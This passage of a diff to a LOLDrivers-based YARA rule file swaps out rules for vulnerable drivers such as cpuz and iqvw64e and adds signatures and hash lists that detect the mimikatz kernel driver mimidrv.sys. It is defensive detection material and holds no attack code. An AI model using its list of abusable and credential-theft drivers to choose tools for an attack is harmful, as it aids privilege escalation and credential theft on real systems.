 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "cac5dc7c3da69b682097144f12a816530091d4708ca432a7ce39f6abe6616461"
-		hash = "51145a3fa8258aac106f65f34159d23c54b48b6d54ec0421748b3939ab6778eb"
-		logic_hash = "f3c26142b2f18490c79ea7a658397b9c029286a3040bf2159e3fcc76c4bbd788"
-		score = 40
+		hash = "6994b32e3f3357f4a1d0abe81e8b62dd54e36b17816f2f1a80018584200a1b77"
+		hash = "5b932eab6c67f62f097a3249477ac46d80ddccdc52654f8674060b4ddf638e5d"
+		hash = "ea50f22daade04d3ca06dedb497b905215cba31aae7b4cab4b533fda0c5be620"
+		hash = "f936ec4c8164cbd31add659b61c16cb3a717eac90e74d89c47afb96b60120280"
+		hash = "32882949ea084434a376451ff8364243a50485a3b4af2f2240bb5f20c164543d"
+		hash = "6661320f779337b95bbbe1943ee64afb2101c92f92f3d1571c1bf4201c38c724"
+		hash = "86047bb1969d1db455493955fd450d18c62a3f36294d0a6c3732c88dfbcc4f62"
+		hash = "06c5ebd0371342d18bc81a96f5e5ce28de64101e3c2fd0161d0b54d8368d2f1f"
+		hash = "4734a0a5d88f44a4939b8d812364cab6ca5f611b9b8ceebe27df6c1ed3a6d8a4"
+		hash = "770f33259d6fb10f4a32d8a57d0d12953e8455c72bb7b60cb39ce505c507013a"
+		hash = "50819a1add4c81c0d53203592d6803f022443440935ff8260ff3b6d5253c0c76"
+		hash = "f9f2091fccb289bcf6a945f6b38676ec71dedb32f3674262928ccaf840ca131a"
+		hash = "fa9abb3e7e06f857be191a1e049dd37642ec41fb2520c105df2227fcac3de5d5"
+		hash = "139f8412a7c6fdc43dcfbbcdba256ee55654eb36a40f338249d5162a1f69b988"
+		hash = "e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d"
+		hash = "e6f764c3b5580cd1675cbf184938ad5a201a8c096607857869bd7c3399df0d12"
+		hash = "bb2422e96ea993007f25c71d55b2eddfa1e940c89e895abb50dd07d7c17ca1df"
+		logic_hash = "161f83c85ad516f3f06f3719a1d8ae0c841e818e50f985403133c2f77b7be894"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0047004500200044006500760069006300650020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0047004500200049006e00740065006c006c006900670065006e007400200050006c006100740066006f0072006d0073002c00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0037002e0030003000200028004200750069006c0064002000350035003100370029 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0037002e0030003000200028004200750069006c0064002000350035003100370029 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0047004500200044006500760069006300650020004400720069007600650072 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500072006f00660069006300790020004d0061006300680069006e0065002000450064006900740069006f006e }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00470045004400650076004400720076002e005300590053 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a900200032003000310031002c00200047004500200049006e00740065006c006c006900670065006e007400200050006c006100740066006f0072006d0073002c00200049006e0063002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570069006e0064006f007700730020004700550049002000730079006d0062006f006c00690063002000640065006200750067006700650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e0030002e00310039003000340031002e0036003800350020002800570069006e004200750069006c0064002e003100360030003100300031002e00300038003000300029 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e0030002e00310039003000340031002e003600380035 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770069006e006400620067002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074003f002000570069006e0064006f00770073003f0020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770069006e006400620067002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]003f0020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Windowsrserverddkprovider_Cpuzsys_Windowsrserverddkdriver_3871 : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_AAF0
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - cpuz_x64.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "ddcb8217-640d-598d-9afd-a1c15d1bbb8c"
+		id = "57e5655e-1313-585f-931c-d892e8952d0e"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11313-L11332"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L62-L120"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3"
-		logic_hash = "5613c77f79128bc7ac3bbe698dcd8be2fca2f59cb60a40ed97f0c80ba9aff690"
-		score = 40
+		hash = "aaf04d89fd15bc61265e545f8e1da80e20f59f90058ed343c62ee24358e3af9e"
+		hash = "4b97d63ebdeda6941bb8cef5e94741c6cca75237ca830561f2262034805f0919"
+		hash = "c42c1e5c3c04163bf61c3b86b04a5ec7d302af7e254990cef359ac80474299da"
+		hash = "f03f0fb3a26bb83e8f8fa426744cf06f2e6e29f5220663b1d64265952b8de1a1"
+		hash = "0f98492c92e35042b09032e3d9aedc357e4df94fc840217fa1091046f9248a06"
+		hash = "d032001eab6cad4fbef19aab418650ded00152143bd14507e17d62748297c23f"
+		hash = "2456a7921fa8ab7b9779e5665e6b42fccc019feb9e49a9a28a33ec0a4bb323c4"
+		hash = "f9b01406864ab081aa77eef4ad15cb2dd2f830d1ef54f52622a59ff1aeb05ba5"
+		hash = "19dfacea1b9f19c0379f89b2424ceb028f2ce59b0db991ba83ae460027584987"
+		hash = "3ca5d47d076e99c312578ef6499e1fa7b9db88551cfc0f138da11105aca7c5e1"
+		hash = "cf9451c9ccc5509b9912965f79c2b95eb89d805b2a186d7521d3a262cf5a7a37"
+		hash = "a0931e16cf7b18d15579e36e0a69edad1717b07527b5407f2c105a2f554224b2"
+		hash = "492113a223d6a3fc110059fe46a180d82bb8e002ef2cd76cbf0c1d1eb8243263"
+		hash = "85b9d7344bf847349b5d58ebe4d44fd63679a36164505271593ef1076aa163b2"
+		hash = "efa56907b9d0ec4430a5d581f490b6b9052b1e979da4dab6a110ab92e17d4576"
+		hash = "12b0000698b79ea3c8178b9e87801cc34bad096a151a8779559519deafd4e3f0"
+		hash = "4136f1eb11cc463a858393ea733d5f1c220a3187537626f7f5d63eccf7c5a03f"
+		hash = "ee525b90053bb30908b5d7bf4c5e9b8b9d6b7b5c9091a26fa25d30d3ad8ef5d0"
+		hash = "10ad50fcb360dcab8539ea322aaf2270565dc835b7535790937348523d723d6b"
+		hash = "4d42678df3917c37f44a1506307f1677b9a689efcf350b1acce7e6f64b514905"
+		hash = "d37996abc8efb29f1ccbb4335ce9ba9158bec86cc4775f0177112e87e4e3be5c"
+		hash = "569fe70bedd0df8585689b0e88ad8bd0544fdf88b9dbfc2076f4bdbcf89c28aa"
+		hash = "80e4c83cfa9d675a6746ab846fa5da76d79e87a9297e94e595a2d781e02673b3"
+		hash = "1a5c08d40a5e73b9fe63ea5761eaec8f41d916ca3da2acbc4e6e799b06af5524"
+		hash = "ee7b8eb150df2788bb9d5fe468327899d9f60d6731c379fd75143730a83b1c55"
+		hash = "a1e6b431534258954db07039117b3159e889c6b9e757329bbd4126383c60c778"
+		hash = "e99580e25f419b5ad90669e0c274cf63d30efa08065d064a863e655bdf77fb59"
+		hash = "b0b80a11802b4a8ca69c818a03e76e7ef57c2e293de456439401e8e6073f8719"
+		hash = "4c89c907b7525b39409af1ad11cc7d2400263601edafc41c935715ef5bd145de"
+		hash = "083f821d90e607ed93221e71d4742673e74f573d0755a96ad17d1403f65a2254"
+		hash = "e8ec06b1fa780f577ff0e8c713e0fd9688a48e0329c8188320f9eb62dfc0667f"
+		hash = "ac5fb90e88d8870cd5569e661bea98cf6b001d83ab7c65a5196ea3743146939a"
+		hash = "7b846b0a717665e4d9fb313f25d1f6a5b782e495387aea45cf87ad3c049ac0db"
+		hash = "93aa3066ae831cdf81505e1bc5035227dc0e8f06ebbbb777832a17920c6a02fe"
+		hash = "082a79311da64b6adc3655e79aa090a9262acaac3b917a363b9571f520a17f6a"
+		hash = "bc49cb96f3136c3e552bf29f808883abb9e651040415484c1736261b52756908"
+		hash = "95e5b5500e63c31c6561161a82f7f9373f99b5b1f54b018c4866df4f2a879167"
+		hash = "d43520128871c83b904f3136542ea46644ac81a62d51ae9d3c3a3f32405aad96"
+		hash = "94c71954ac0b1fd9fa2bd5c506a16302100ba75d9f84f39ee9b333546c714601"
+		hash = "793b78e70b3ae3bb400c5a8bc4d2d89183f1d7fc70954aed43df7287248b6875"
+		logic_hash = "9566444b1d3adb2a8a5f48b45bbbdb5c9be3ce399ec091e3ffd13780a90227f1"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004300500055004900440020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000530065007200760065007200200032003000300033002000440044004b002000700072006f00760069006400650072 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e00300020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006300700075007a002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000530065007200760065007200200032003000300033002000440044004b0020006400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006300700075007a002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000320030002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Lowleveldriver_F941 : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_DDF4
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - GPU-Z.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "a65168c0-5f0e-5871-867b-bab6f42b3c21"
+		id = "0b38be06-60df-5b49-a748-eb175e1db33f"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11335-L11351"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L123-L156"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "f9418b5e90a235339a4a1a889490faca39cd117a51ba4446daa1011da06c7ecd"
-		logic_hash = "fdc81fdc11ac6db386f4c41c2c34ab9dbd8dd93836a6a91b9412288eca7f0411"
-		score = 40
+		hash = "ddf427ce55b36db522f638ba38e34cd7b96a04cb3c47849b91e7554bfd09a69a"
+		hash = "bcb774b6f6ff504d2db58096601bc5cb419c169bfbeaa3af852417e87d9b2aa0"
+		hash = "af4f42197f5ce2d11993434725c81ecb6f54025110dedf56be8ffc0e775d9895"
+		hash = "9dc7beb60a0a6e7238fc8589b6c2665331be1e807b4d2b3ddd1c258dbbd3e2f7"
+		hash = "2da2b883e48e929f5365480d487590957d9e6582cc6da2c0b42699ba85e54fe2"
+		hash = "29348ebe12d872c5f40e316a0043f7e5babe583374487345a79bad0ba93fbdfe"
+		hash = "e4b2c0aa28aac5e197312a061b05363e2e0387338b28b23272b5b6659d29b1d8"
+		hash = "897f2bbe81fc3b1ae488114b93f3eb0133a85678d061c7a6f718507971f33736"
+		hash = "0f7bfa10075bf5c193345866333d415509433dbfe5a7d45664b88d72216ff7c3"
+		hash = "469713c76c7a887826611b8c7180209a8bb6250f91d0f1eb84ac4d450ef15870"
+		hash = "818787057fc60ac8b957aa37d750aa4bace8e6a07d3d28b070022ee6dcd603ab"
+		hash = "4af8192870afe18c77381dfaf8478f8914fa32906812bb53073da284a49ae4c7"
+		hash = "0740359baef32cbb0b14a9d1bd3499ea2e770ff9b1c85898cfac8fd9aca4fa39"
+		hash = "62764ddc2dce74f2620cd2efd97a2950f50c8ac5a1f2c1af00dc5912d52f6920"
+		hash = "3b2cd65a4fbdd784a6466e5196bc614c17d1dbaed3fd991d242e3be3e9249da6"
+		logic_hash = "d20bfd9f05a7cdb031f3ada2801ee3b978a9d27407b4425c7aa7eb41b4549b18"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004c006f0077002d004c006500760065006c0020004400720069007600650072 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e00360030002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e00360030002e0030002e0030 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004c006f0077002d004c006500760065006c0020004400720069007600650072 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200032003000300034002d00320030003100300020002800630029002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310036002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Intelcorporation_Iqvwsys_Intelriqvwsys_37C6 : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_0F58
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - iqvw64e.sys, iQVW64.SYS, IQVW32.sys, NalDrv.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "f4b17a75-3160-5a73-afe6-531c41fae197"
+		id = "0531a88d-cb21-5055-b365-a80b6e99a6e9"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11354-L11373"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L159-L191"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9"
-		logic_hash = "7ab6c3fe4c9cd61c171a71d631a8efc34121bac85e1abf5f281b150f4b6a77a5"
-		score = 40
+		hash = "0f58e09651d48d2b1bcec7b9f7bb85a2d1a7b65f7a51db281fe0c4f058a48597"
+		hash = "087270d57f1626f29ba9c25750ca19838a869b73a1f71af50bdf37d6ff776212"
+		hash = "0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35"
+		hash = "06ddf49ac8e06e6b83fccba1141c90ea01b65b7db592c54ffe8aa6d30a75c0b8"
+		hash = "eab9b5b7e5fab1c2d7d44cd28f13ae8bb083d9362d2b930d43354a3dfd38e05a"
+		hash = "627e13da6a45006fff4711b14754f9ccfac9a5854d275da798a22f3a68dd1eaa"
+		hash = "b169a5f643524d59330fafe6e3e328e2179fc5116ee6fae5d39581467d53ac03"
+		hash = "dfc80e0d468a2c115a902aa332a97e3d279b1fc3d32083e8cf9a4aadf3f54ad1"
+		hash = "a74e8f94d2c140646a8bb12e3e322c49a97bd1b8a2e4327863d3623f43d65c66"
+		hash = "94ba4bcbdb55d6faf9f33642d0072109510f5c57e8c963d1a3eb4f9111f30112"
+		hash = "07759750fbb93c77b5c3957c642a9498fcff3946a5c69317db8d6be24098a4a0"
+		hash = "4dc24fd07f8fb854e685bc540359c59f177de5b91231cc44d6231e33c9e932b1"
+		hash = "baf7fbc4743a81eb5e4511023692b2dfdc32ba670ba3e4ed8c09db7a19bd82d3"
+		hash = "bcca03ce1dd040e67eb71a7be0b75576316f0b6587b2058786fda8b6f0a5adfd"
+		logic_hash = "ffa3eaf9032aa673119558217d212ff819ce91e99ab6c046f8801990d5826689"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049006e00740065006c0028005200290020004e006500740077006f0072006b0020004100640061007000740065007200200044006900610067006e006f00730074006900630020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0049006e00740065006c00200043006f00720070006f0072006100740069006f006e0020 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0033002e0032002e003100370020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0033002e0032002e00310037 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006900510056005700360034002e005300590053 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0049006e00740065006c0028005200290020006900510056005700360034002e005300590053 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006900510056005700360034002e005300590053 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300032002d003200300031003800200049006e00740065006c00200043006f00720070006f0072006100740069006f006e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310034002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Toshibacorporation_Nchgbiosxsys_Toshibabiospackage_3143 : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_7662
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - NCHGBIOS2x64.SYS"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "c0a7d14e-65aa-51e1-a2c1-88a7c56dce57"
+		id = "2bb58484-03d2-5ccc-b165-cfe405f60f03"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11376-L11395"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L194-L235"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073"
-		logic_hash = "ce2da14c74299d4ad3ab5b882de8bfe810444f21711f2417291bd0298a480e71"
-		score = 40
+		hash = "7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d"
+		hash = "a85d3fd59bb492a290552e5124bfe3f9e26a3086d69d42ccc44737b5a66673ec"
+		hash = "60ee78a2b070c830fabb54c6bde0d095dff8fad7f72aa719758b3c41c72c2aa9"
+		hash = "b2486f9359c94d7473ad8331b87a9c17ca9ba6e4109fd26ce92dff01969eaa09"
+		hash = "d41e39215c2c1286e4cd3b1dc0948adefb161f22bc3a78756a027d41614ee4ff"
+		hash = "008fa89822b7a1f91e5843169083202ea580f7b06eb6d5cae091ba844d035f25"
+		hash = "8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe"
+		hash = "aafa642ca3d906138150059eeddb6f6b4fe9ad90c6174386cfe13a13e8be47d9"
+		hash = "fefc070a5f6a9c0415e1c6f44512a33e8d163024174b30a61423d00d1e8f9bf2"
+		hash = "6964a5d85639baee288555797992861232e75817f93028b50b8c6d34aa38b05b"
+		hash = "443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85"
+		hash = "e8743094f002239a8a9d6d7852c7852e0bb63cd411b007bd8c194bcba159ef15"
+		hash = "ec96b15ce218f97ec1d8f07f13b052d274c4c8438f31daf246ccfaaee5e1bebd"
+		hash = "beef40f1b4ce0ff2ee5c264955e6b2a0de6fe4089307510378adc83fad77228b"
+		hash = "e858de280bd72d7538386a73e579580a6d5edba87b66b3671dc180229368be19"
+		hash = "21617210249d2a35016e8ca6bd7a1edda25a12702a2294d56010ee8148637f5a"
+		hash = "02ebf848fa618eba27065db366b15ee6629d98f551d20612ac38b9f655f37715"
+		hash = "40556dd9b79b755cc0b48d3d024ceb15bd2c0e04960062ab2a85cd7d4d1b724a"
+		hash = "8b30b2dc36d5e8f1ffc7281352923773fb821cdf66eb6516f82c697a524b599b"
+		hash = "2ce4f8089b02017cbe86a5f25d6bc69dd8b6f5060c918a64a4123a5f3be1e878"
+		hash = "d7aa8abdda8a68b8418e86bef50c19ef2f34bc66e7b139e43c2a99ab48c933be"
+		hash = "82ac05fefaa8c7ee622d11d1a378f1d255b647ab2f3200fd323cc374818a83f2"
+		hash = "c7cd14c71bcac5420872c3d825ff6d4be6a86f3d6a8a584f1a756541efff858e"
+		logic_hash = "089f046e94a9cb4f576896e90375d6dbcaef61aa302af07f80230a74bc33ed18"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00420049004f00530020005500700064006100740065002000440072006900760065007200200046006f0072002000570069006e0064006f007700730020007800360034002000450064006900740069006f006e }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0054004f0053004800490042004100200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0034002e0032002e0034002e00300020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0034002e0032002e0034002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]004e00430048004700420049004f00530032007800360034002e005300590053 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0054004f00530048004900420041002000420049004f00530020005000610063006b006100670065 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]004e00430048004700420049004f00530032007800360034002e005300590053 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200031003900390039002d003200300031003200200054004f0053004800490042004100200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310037002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Zemanaltd_Zam_5439 : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_14B8
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - zam64.sys, zamguard32.sys, zamguard64.sys"
